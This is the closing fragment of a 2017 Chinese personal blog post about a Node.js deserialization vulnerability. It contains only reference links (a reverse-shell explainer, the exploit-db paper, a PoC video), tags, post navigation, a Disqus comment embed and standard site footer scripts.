<p>PS:<a href="https://www.zhihu.com/question/24503813" target="_blank" rel="noopener">反弹shell是什么？</a><br><a href="https://www.exploit-db.com/docs/41289.pdf" target="_blank" rel="noopener">漏洞原文</a><br><a href="https://www.youtube.com/watch?v=GFacPoWOcw0" target="_blank" rel="noopener">POC演示视频</a></p>

      
    </div>

    
      
      



      
      
    

    
      <footer class="post-footer">
        
          <div class="post-tags">
            
              <a href="/tags/nodejs/">nodejs</a>
            
              <a href="/tags/unserialize/">unserialize</a>
            
              <a href="/tags/shell/">shell</a>
            
              <a href="/tags/IIFE/">IIFE</a>
            
          </div>
        
        
        
  <nav class="post-nav">
    
      <a class="prev" href="/2017/05/19/Mysql安装和操作-flask/">
        <i class="iconfont icon-left"></i>
        <span class="prev-text nav-default">Mysql安装和操作(flask)</span>
        <span class="prev-text nav-mobile">上一篇</span>
      </a>
    
    
      <a class="next" href="/2017/05/17/痛苦的数据结构OJ/">
        <span class="next-text nav-default">痛苦的数据结构OJ</span>
        <span class="prev-text nav-mobile">下一篇</span>
        <i class="iconfont icon-right"></i>
      </a>
    
  </nav>

      </footer>
    

  </article>


          </div>
          
  <div class="comments" id="comments">
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="//disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div> 
    </div>
  </div>


        </div>
      </main>

      <footer id="footer" class="footer">

  <div class="social-links">
    
      
        
          <a href="https://github.com/bay1" class="iconfont icon-github" title="github"></a>
        
      
    
      
        
          <a href="http://weibo.com/3190704711/profile?topnav=1&wvr=6&is_all=1" class="iconfont icon-weibo" title="weibo"></a>
        
      
    
      
    
      
    
      
    
    
    
  </div>


<div class="copyright">
  <span class="copyright-year">
    
    &copy; 
     
      2016 - 
    
    2018
    <span class="author">bay1</span>
  </span>
</div>
      </footer>

      <div class="back-to-top" id="back-to-top">
        <i class="iconfont icon-up"></i>
      </div>
    </div>

    
  
  <script type="text/javascript">
    var disqus_config = function () {
        this.page.url = 'https://bay1.top/2017/05/18/nodejs反序列化漏洞/';
        this.page.identifier = '2017/05/18/nodejs反序列化漏洞/';
        this.page.title = 'nodejs反序列化漏洞';
    };
    (function() {
    var d = document, s = d.createElement('script');

    s.src = '//https-blog-flywinky-top-1.disqus.com/embed.js';

    s.setAttribute('data-timestamp', +new Date());
    (d.head || d.body).appendChild(s);
    })();  
  </script>



    
  





  
    <script type="text/javascript" src="/lib/jquery/jquery-3.1.1.min.js"></script>
  

  
    <script type="text/javascript" src="/lib/slideout/slideout.js"></script>
  

  
    <script type="text/javascript" src="/lib/fancybox/jquery.fancybox.pack.js"></script>
  


    <script type="text/javascript" src="/js/src/even.js?v=2.6.0"></script>
<script type="text/javascript" src="/js/src/bootstrap.js?v=2.6.0"></script>
<script src="/js/prettify.js"></script>
<script type="text/javascript">
$(document).ready(function(){
 $('pre').addClass('prettyprint');
   prettyPrint();
 })
</script>
  </body>
</html>
